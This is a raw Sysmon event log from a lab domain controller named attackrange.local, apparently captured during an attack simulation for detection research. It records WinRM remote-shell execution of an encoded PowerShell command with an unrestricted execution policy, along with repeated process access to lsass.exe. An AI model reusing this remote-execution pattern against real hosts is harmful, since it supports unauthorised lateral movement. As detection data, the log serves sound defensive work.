13:08:50.324{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000580Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:50.324{08A6967A-4262-6000-E902-000000009901}48404548C:\Windows\system32\WinrsHost.exe{08A6967A-4262-6000-EB02-000000009901}1248C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 154100x8000000000000000579Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:50.332{08A6967A-4262-6000-EB02-000000009901}1248C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{08A6967A-4262-6000-E7E0-110000000000}0x11e0e70HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{08A6967A-4262-6000-E902-000000009901}4840C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x8000000000000000578Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:50.324{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000577Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:50.324{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000576Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:50.324{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000575Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:50.277{08A6967A-40E0-6000-1400-000000009901}13001752C:\Windows\system32\svchost.exe{08A6967A-4262-6000-E902-000000009901}4840C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x8000000000000000574Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:50.261{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4262-6000-E902-000000009901}4840C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000573Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:50.246{08A6967A-4262-6000-EA02-000000009901}41283532C:\Windows\system32\conhost.exe{08A6967A-4262-6000-E902-000000009901}4840C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000572Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:50.246{08A6967A-40D2-6000-0500-000000009901}644660C:\Windows\system32\csrss.exe{08A6967A-4262-6000-EA02-000000009901}4128C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000571Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:50.246{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000570Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:50.246{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000569Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:50.246{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000568Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:50.230{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000567Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:50.230{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000566Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:50.230{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000565Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:50.230{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000564Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:50.230{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000563Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:50.230{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000562Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:50.230{08A6967A-40D2-6000-0500-000000009901}644768C:\Windows\system32\csrss.exe{08A6967A-4262-6000-E902-000000009901}4840C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000561Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:50.230{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4262-6000-E902-000000009901}4840C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000560Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:50.244{08A6967A-4262-6000-E902-000000009901}4840C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{08A6967A-4262-6000-E7E0-110000000000}0x11e0e70HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{08A6967A-40DF-6000-0C00-000000009901}480C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x8000000000000000559Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:50.230{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000558Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:50.230{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000557Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:50.230{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000556Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 